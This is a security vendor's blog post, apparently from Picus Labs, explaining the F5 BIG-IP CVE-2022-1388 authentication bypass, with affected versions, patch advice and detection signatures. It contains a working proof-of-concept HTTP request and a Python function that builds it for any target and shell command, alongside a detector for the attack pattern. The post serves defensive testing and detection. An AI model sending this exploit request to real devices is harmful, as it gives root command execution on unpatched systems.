Simulating and Preventing F5 BIG-IP CVE-2022-1388 RCE Exploits

On May 18th, 2022, the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) released a joint advisory on the remote code execution vulnerability CVE-2022-1388 in F5 BIG-IP products [1]. When exploited, CVE-2022-1388 allows attackers to run arbitrary code and gain control of affected products.

Picus Labs has updated the Picus Threat Library with simulations of exploitation attacks against the CVE-2022-1388 vulnerability affecting F5 BIG-IP products.

Start simulating CVE-2022-1388 attacks with a 14-Day Free Trial of the Picus Platform 

What Is the CVE-2022-1388 Vulnerability?

F5 Networks published information about the CVE-2022-1388 remote code execution vulnerability on May 4th, 2022 [2]. An unauthenticated adversary with network access to the BIG-IP system through the management port and/or self IP addresses may exploit CVE-2022-1388 to execute arbitrary system commands.

The iControl REST endpoint "/mgmt/tm/util/bash" lets an authenticated BIG-IP administrator run shell commands as the root user of the device. The endpoint itself is meant to require authentication; CVE-2022-1388 is an authentication bypass in how iControl REST handles the X-F5-Auth-Token header. When a request lists X-F5-Auth-Token in its Connection header, the Apache front end that proxies iControl REST strips it as a hop-by-hop header before forwarding the request, and the back end then falls back to the HTTP basic Authorization header and accepts the "admin" username without verifying the password. Therefore, adversaries with network access to the management interface or a self IP of an affected F5 BIG-IP product can execute commands remotely as root.

What Is the Impact of the CVE-2022-1388 Vulnerability?

48 of the Fortune 50 companies use F5 products. Due to this wide use, exploitation of CVE-2022-1388 may have serious consequences. Since the vulnerability allows unauthenticated attackers to execute arbitrary code on F5 BIG-IP products, the CVSSv3 base score for CVE-2022-1388 is 9.8 (Critical).

The CVE-2022-1388 vulnerability enables remote code execution on systems running vulnerable F5 BIG-IP versions and gives the attacker complete control of the affected device. For example, attackers can exploit CVE-2022-1388 to run malicious code and install webshells as backdoors on vulnerable systems to maintain access for post-exploitation.

Which F5 BIG-IP Versions Are Affected?

Affected and fixed F5 BIG-IP versions are shown in the table below:

Affected Versions     Fixed Version
16.1.0 - 16.1.2       16.1.2.2
15.1.0 - 15.1.5       15.1.5.1
14.1.0 - 14.1.4       14.1.4.6
13.1.0 - 13.1.4       13.1.5
12.1.0 - 12.1.6       Not fixed - EOL
11.6.1 - 11.6.5       Not fixed - EOL

What Is the Current Situation?

F5 released patches for affected products on May 4th, 2022, alongside the security advisory for the vulnerability. The 17.x versions are not affected by CVE-2022-1388. Since versions 12.1.x and 11.6.x are end-of-life (EOL), no patches are available for them.

What Should You Do?

Since F5 BIG-IP is a widely used product and public proof-of-concept (PoC) exploits for CVE-2022-1388 are available, users are advised to patch their affected products without delay. Where patching is not immediately possible, the F5 advisory [2] also describes temporary mitigations, such as restricting iControl REST access through self IP addresses and the management interface to trusted networks only.

CVE-2022-1388 F5 BIG-IP PoC Exploit

The following conditions must hold for a request to exploit the CVE-2022-1388 vulnerability:

  • A POST request is sent to the vulnerable endpoint, "/mgmt/tm/util/bash".
  • An "X-F5-Auth-Token" header is present. Its value does not matter, because the front end strips the header before it reaches the back end.
    • Example: X-F5-Auth-Token: 0
  • The "Authorization" header carries HTTP basic credentials for the "admin" user with any password, including an empty one, since the password is not checked.
    • Example: Authorization: Basic YWRtaW46
    • YWRtaW46 is the Base64 encoding of "admin:", i.e. username "admin" and an empty password.
  • The "Connection" header names "X-F5-Auth-Token" as a hop-by-hop header, which makes the front-end proxy remove it.
    • Example: Connection: X-F5-Auth-Token
  • The request must appear to originate locally: either the "Host" header is localhost / 127.0.0.1, or the "Connection" header also names "X-Forwarded-Host" so that the header added by the proxy is dropped as well.
    • Example: Connection: X-F5-Auth-Token, X-Forwarded-Host
  • The "command" parameter in the JSON body is "run".
    • Example: "command": "run"
  • The "utilCmdArgs" parameter holds the arguments passed to bash, i.e. -c followed by the command to execute as root.
    • Example: "utilCmdArgs": "-c 'whoami'"

Therefore, you can test your F5 BIG-IP devices against CVE-2022-1388 exploitation attacks with the following POST request (replace the placeholder with the target's address; note that the Content-Length must match the JSON body, here 52 bytes, or the back end will ignore the body):

POST /mgmt/tm/util/bash HTTP/1.1
Host: <IP_of_target_f5_product>:8443
X-F5-Auth-Token: 0
Authorization: Basic YWRtaW46
Connection: X-F5-Auth-Token, X-Forwarded-Host
X-Forwarded-For: localhost
Content-Type: application/json
Content-Length: 52

{"command": "run" , "utilCmdArgs": " -c 'whoami' " }

Example Code: Proof of Concept POST request for CVE-2022-1388 exploit
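The two sides of the conditions above, as an added example that is not code from the original post, from F5 or from Picus: build_poc_request() assembles the raw probe request exactly as listed (computing Content-Length from the body instead of hard-coding it), and is_cve_2022_1388_attempt() inspects a raw HTTP request, for instance one logged by a reverse proxy or captured in front of the management interface, and reports whether it carries the bypass pattern. The detection generalizes beyond the text: the header trick works against any iControl REST path under /mgmt/, so the check keys on the Connection header and only calls out /mgmt/tm/util/bash as the command execution endpoint. The IP addresses, token value and sample requests are constructed for the example.

```python
import base64
from typing import Optional

# Added example, not code from the original post, F5 or Picus. Hosts, tokens
# and the sample requests below are constructed values for illustration.

BASH_ENDPOINT = "/mgmt/tm/util/bash"


def build_poc_request(target: str, command: str = "whoami", port: int = 8443) -> bytes:
    """Build the raw HTTP/1.1 probe request described in the conditions above."""
    # utilCmdArgs is handed to bash, so "-c '<command>'" runs <command> as root.
    body = '{"command": "run", "utilCmdArgs": "-c \'%s\'"}' % command
    # "admin:" -> YWRtaW46: user admin, empty password. The password is never
    # checked once the X-F5-Auth-Token header has been stripped by the front end.
    basic = base64.b64encode(b"admin:").decode("ascii")
    headers = [
        f"POST {BASH_ENDPOINT} HTTP/1.1",
        f"Host: {target}:{port}",
        # Any value works: the header only has to exist so that naming it in
        # Connection makes the front end drop it as a hop-by-hop header.
        "X-F5-Auth-Token: 0",
        f"Authorization: Basic {basic}",
        "Connection: X-F5-Auth-Token, X-Forwarded-Host",
        "Content-Type: application/json",
        f"Content-Length: {len(body.encode('utf-8'))}",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + body).encode("utf-8")


def parse_request(raw: bytes):
    """Split a raw request into (method, target, headers, body); None if malformed.

    Header names are lower-cased and repeated headers are joined with commas,
    which is how an HTTP intermediary is allowed to treat them."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    method, target, _version = parts
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon:
            return None
        name = name.strip().lower()
        value = value.strip()
        headers[name] = headers[name] + ", " + value if name in headers else value
    return method, target, headers, body


def is_cve_2022_1388_attempt(raw: bytes) -> Optional[str]:
    """Return a short reason if raw looks like a CVE-2022-1388 attempt, else None."""
    parsed = parse_request(raw)
    if parsed is None:
        return None
    method, target, headers, _body = parsed
    path = target.split("?", 1)[0]
    if not path.startswith("/mgmt/"):
        return None  # not iControl REST at all
    connection = {t.strip().lower() for t in headers.get("connection", "").split(",")}
    if "x-f5-auth-token" not in connection:
        # A normal client never lists an end-to-end auth header as hop-by-hop.
        return None
    user = ""
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            user = base64.b64decode(auth[6:].strip()).decode("latin-1").split(":", 1)[0]
        except ValueError:  # binascii.Error is a ValueError
            user = "<undecodable>"
    reason = f"{method} {path}: Connection header names X-F5-Auth-Token"
    if user:
        reason += f", basic auth as '{user}'"
    if path.rstrip("/") == BASH_ENDPOINT:
        reason += " (remote command execution endpoint)"
    return reason


# Constructed sample traffic: the probe above, a valid token-based API call,
# and a normal basic-auth login that should both stay clean.
SAMPLE_REQUESTS = {
    "probe": build_poc_request("192.0.2.10"),
    "legit_token": (
        b"GET /mgmt/tm/ltm/virtual HTTP/1.1\r\n"
        b"Host: 192.0.2.10:8443\r\n"
        b"X-F5-Auth-Token: 7F3C0C3A2B1D4E5F6A7B8C9D0E1F2A3B\r\n"
        b"Connection: keep-alive\r\n\r\n"
    ),
    "legit_login": (
        b"POST /mgmt/shared/authn/login HTTP/1.1\r\n"
        b"Host: 192.0.2.10:8443\r\n"
        b"Authorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n"
        b"Content-Type: application/json\r\n"
        b"Content-Length: 2\r\n\r\n{}"
    ),
}


def scan(requests: dict) -> dict:
    """Run the check over a batch of raw requests and return a verdict per name."""
    return {name: is_cve_2022_1388_attempt(raw) for name, raw in requests.items()}


if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_REQUESTS).items():
        print(f"{name:12s} -> {verdict or 'clean'}")
```

The detector deliberately does not require the Authorization or X-F5-Auth-Token headers to be present: listing X-F5-Auth-Token in Connection has no legitimate use, so that alone is the indicator, and the decoded basic-auth username is added to the verdict only to make triage faster.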

How Does Picus Help Simulate and Prevent CVE-2022-1388 F5 BIG-IP Remote Code Execution Exploits?

We also strongly suggest simulating the CVE-2022-1388 vulnerability to test the effectiveness of your security controls, such as Web Application Firewalls (WAF), Intrusion Prevention Systems (IPS), and Next-Generation Firewalls (NGFW), against F5 BIG-IP RCE attacks using the Picus Complete Security Control Validation Platform. You can test your defenses against the CVE-2022-1388 vulnerability and hundreds of other commonly exploited vulnerabilities within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threat for the CVE-2022-1388 vulnerability:

Threat ID   Threat Name
97569       F5 Web Attack Campaign

This threat in Picus Threat Library also includes the following actions for previous F5 BIG-IP vulnerabilities:

CVE             Threat Name
CVE-2020-5902   F5 BIG-IP Local File Inclusion (LFI) Vulnerability
CVE-2020-5902   F5 BIG-IP Remote Code Execution (RCE) Vulnerability


Moreover, Picus Threat Library contains 150+ threats containing 1500+ web application and vulnerability exploitation attacks in addition to 3500+ endpoint, malware, email, and data exfiltration threats as of today.

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures that address CVE-2022-1388 F5 BIG-IP RCE and other vulnerability exploitation attacks in preventive security controls. Picus Labs has validated the following signatures (Forcepoint does not publish numeric IDs for the listed signatures, so that column is left empty for them):

Security Control          Signature ID   Signature Name
Cisco Firepower NGFW      1.57336.3      POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt
Cisco Firepower NGFW      1.59735.2      SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt
Cisco SourceFire IPS      1.57336.3      POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt
Cisco SourceFire IPS      1.59735.2      SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt
Citrix Web App Firewall   999945         web-misc apache http server authentication bypass vulnerability in ap_get_basic_auth_pw() via basic authorization headers
Forcepoint NGFW           -              HTTP_CRL-F5-iControl-Rest-Unauthenticated-RCE-CVE-2022-1388
Forcepoint NGFW           -              HTTP_CSH-Apache-HTTP-Server-Mod_rpaf-X-Forwarded-For-Denial-Of-Service
FortiGate IPS             51543          applications3: F5.BIG-IP.iControl.REST.Authentication.Bypass
F5 BIG-IP ASM             200013045      BIG-IP iControl REST Authentication Bypass (3)
Snort IPS                 1.57336.1      POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt
Snort IPS                 1.59735.2      SERVER-WEBAPP F5 BIG-IP iControl remote code execution attempt
Snort IPS                 1.57336.3      POLICY-OTHER F5 iControl REST interface tm.util.bash invocation attempt
Trend Micro TippingPoint  12639          HTTP: Apache HTTP Server X-Forwarded-For Denial-of-Service


Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Complete Security Control Validation Platform.

References

[1] https://www.cisa.gov/uscert/sites/default/files/publications/AA22-138A-Threat_Actors_Exploiting_F5_BIG-IP_CVE-2022-1388_F5.pdf

[2] https://support.f5.com/csp/article/K23605346